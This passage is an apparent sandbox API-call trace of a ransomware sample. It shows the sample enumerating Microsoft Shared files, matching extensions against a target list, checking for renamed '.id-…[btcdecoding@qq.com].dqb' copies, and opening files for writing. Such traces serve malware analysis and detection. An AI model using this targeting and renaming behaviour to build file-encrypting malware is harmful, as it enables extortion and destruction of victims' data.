[0053.324] lstrlenW (lpString=".zip") returned 4 [0053.324] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0053.324] lstrlenW (lpString=".rar") returned 4 [0053.324] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0053.324] lstrlenW (lpString=".bz2") returned 4 [0053.324] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0053.324] lstrlenW (lpString=".7z") returned 3 [0053.324] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0053.324] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.324] lstrlenW (lpString=".dbf") returned 4 [0053.324] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString=".1cd") returned 4 [0053.325] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString=".jpg") returned 4 [0053.325] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString=".doc") returned 4 [0053.325] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString=".docx") returned 5 [0053.325] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0053.325] lstrlenW (lpString=".pdf") returned 4 [0053.325] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString=".xls") returned 4 [0053.325] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0053.325] lstrlenW (lpString=".xlsx") returned 5 [0053.325] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0053.325] lstrlenW (lpString=".ppt") returned 4 [0053.325] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString=".zip") returned 4 [0053.325] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0053.325] lstrlenW (lpString=".rar") returned 4 [0053.325] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString=".bz2") returned 4 [0053.325] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString=".7z") returned 3 [0053.325] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.325] lstrlenW (lpString=".dbf") returned 4 [0053.325] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0053.325] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.326] lstrlenW (lpString=".1cd") returned 4 [0053.326] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0053.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0053.326] lstrlenW (lpString=".jpg") returned 4 [0053.326] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0053.326] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0053.326] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0053.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.602] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=3584) returned 1 [0053.602] CloseHandle (hObject=0x178) returned 1 [0053.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20 [0053.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.602] lstrlenW (lpString=".doc") returned 4 [0053.602] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString=".docx") returned 5 [0053.603] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.603] lstrlenW (lpString=".pdf") returned 4 [0053.603] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString=".xls") returned 4 [0053.603] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString=".xlsx") returned 5 [0053.603] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.603] lstrlenW (lpString=".ppt") returned 4 [0053.603] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString=".zip") returned 4 [0053.603] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString=".rar") returned 4 [0053.603] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString=".bz2") returned 4 [0053.603] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString=".7z") returned 3 [0053.603] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString=".dbf") returned 4 [0053.603] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString=".1cd") returned 4 [0053.603] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString=".jpg") returned 4 [0053.603] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.603] lstrlenW (lpString=".doc") returned 4 [0053.603] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.603] lstrlenW (lpString=".docx") returned 5 [0053.603] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.603] lstrlenW (lpString=".pdf") returned 4 [0053.603] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.603] lstrlenW (lpString=".xls") returned 4 [0053.604] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.604] lstrlenW (lpString=".xlsx") returned 5 [0053.604] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.604] lstrlenW (lpString=".ppt") returned 4 [0053.604] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.604] lstrlenW (lpString=".zip") returned 4 [0053.604] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.604] lstrlenW (lpString=".rar") returned 4 [0053.604] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.604] lstrlenW (lpString=".bz2") returned 4 [0053.604] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.604] lstrlenW (lpString=".7z") returned 3 [0053.604] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.604] lstrlenW (lpString=".dbf") returned 4 [0053.604] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.604] lstrlenW (lpString=".1cd") returned 4 [0053.604] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0053.604] lstrlenW (lpString=".jpg") returned 4 [0053.604] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.604] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0053.604] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0053.604] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.605] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=4096) returned 1 [0053.605] CloseHandle (hObject=0x178) returned 1 [0053.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0053.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.605] lstrlenW (lpString=".doc") returned 4 [0053.605] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.605] lstrlenW (lpString=".docx") returned 5 [0053.605] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.605] lstrlenW (lpString=".pdf") returned 4 [0053.605] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.605] lstrlenW (lpString=".xls") returned 4 [0053.605] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.605] lstrlenW (lpString=".xlsx") returned 5 [0053.605] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.605] lstrlenW (lpString=".ppt") returned 4 [0053.605] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".zip") returned 4 [0053.606] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString=".rar") returned 4 [0053.606] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString=".bz2") returned 4 [0053.606] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.606] lstrlenW (lpString=".7z") returned 3 [0053.606] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".dbf") returned 4 [0053.606] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".1cd") returned 4 [0053.606] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".jpg") returned 4 [0053.606] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".doc") returned 4 [0053.606] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.606] lstrlenW (lpString=".docx") returned 5 [0053.606] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.606] lstrlenW (lpString=".pdf") returned 4 [0053.606] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString=".xls") returned 4 [0053.606] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString=".xlsx") returned 5 [0053.606] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.606] lstrlenW (lpString=".ppt") returned 4 [0053.606] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.606] lstrlenW (lpString=".zip") returned 4 [0053.606] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.606] lstrlenW (lpString=".rar") returned 4 [0053.606] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.607] lstrlenW (lpString=".bz2") returned 4 [0053.607] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.607] lstrlenW (lpString=".7z") returned 3 [0053.607] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.607] lstrlenW (lpString=".dbf") returned 4 [0053.607] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.607] lstrlenW (lpString=".1cd") returned 4 [0053.607] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0053.607] lstrlenW (lpString=".jpg") returned 4 [0053.607] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.607] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0053.607] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0053.607] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.607] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=193024) returned 1 [0053.607] CloseHandle (hObject=0x178) returned 1 [0053.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20 [0053.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString=".doc") returned 4 [0053.608] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.608] lstrlenW (lpString=".docx") returned 5 [0053.608] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0053.608] lstrlenW (lpString=".pdf") returned 4 [0053.608] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.608] lstrlenW (lpString=".xls") returned 4 [0053.608] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.608] lstrlenW (lpString=".xlsx") returned 5 [0053.608] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0053.608] lstrlenW (lpString=".ppt") returned 4 [0053.608] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString=".zip") returned 4 [0053.608] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.608] lstrlenW (lpString=".rar") returned 4 [0053.608] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.608] lstrlenW (lpString=".bz2") returned 4 [0053.608] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.608] lstrlenW (lpString=".7z") returned 3 [0053.608] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString=".dbf") returned 4 [0053.608] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString=".1cd") returned 4 [0053.608] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.608] lstrlenW (lpString=".jpg") returned 4 [0053.609] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.609] lstrlenW (lpString=".doc") returned 4 [0053.609] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.609] lstrlenW (lpString=".docx") returned 5 [0053.609] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0053.609] lstrlenW (lpString=".pdf") returned 4 [0053.609] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString=".xls") returned 4 [0053.609] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString=".xlsx") returned 5 [0053.609] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0053.609] lstrlenW (lpString=".ppt") returned 4 [0053.609] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.609] lstrlenW (lpString=".zip") returned 4 [0053.609] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString=".rar") returned 4 [0053.609] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.609] lstrlenW (lpString=".bz2") returned 4 [0053.609] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.609] lstrlenW (lpString=".7z") returned 3 [0053.609] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.609] lstrlenW (lpString=".dbf") returned 4 [0053.609] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.609] lstrlenW (lpString=".1cd") returned 4 [0053.609] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0053.610] lstrlenW (lpString=".jpg") returned 4 [0053.610] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.610] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0053.610] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0053.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.610] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=3584) returned 1 [0053.610] CloseHandle (hObject=0x178) returned 1 [0053.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0053.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".doc") returned 4 [0053.611] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.611] lstrlenW (lpString=".docx") returned 5 [0053.611] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.611] lstrlenW (lpString=".pdf") returned 4 [0053.611] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.611] lstrlenW (lpString=".xls") returned 4 [0053.611] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.611] lstrlenW (lpString=".xlsx") returned 5 [0053.611] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.611] lstrlenW (lpString=".ppt") returned 4 [0053.611] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".zip") returned 4 [0053.611] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.611] lstrlenW (lpString=".rar") returned 4 [0053.611] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.611] lstrlenW (lpString=".bz2") returned 4 [0053.611] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.611] lstrlenW (lpString=".7z") returned 3 [0053.611] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".dbf") returned 4 [0053.611] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".1cd") returned 4 [0053.611] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".jpg") returned 4 [0053.611] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.611] lstrlenW (lpString=".doc") returned 4 [0053.611] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.612] lstrlenW (lpString=".docx") returned 5 [0053.612] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0053.612] lstrlenW (lpString=".pdf") returned 4 [0053.612] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.612] lstrlenW (lpString=".xls") returned 4 [0053.612] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.612] lstrlenW (lpString=".xlsx") returned 5 [0053.612] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0053.612] lstrlenW (lpString=".ppt") returned 4 [0053.612] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0053.612] lstrlenW (lpString=".zip") returned 4 [0053.612] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.612] lstrlenW (lpString=".rar") returned 4 [0053.612] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.612] lstrlenW (lpString=".bz2") returned 4 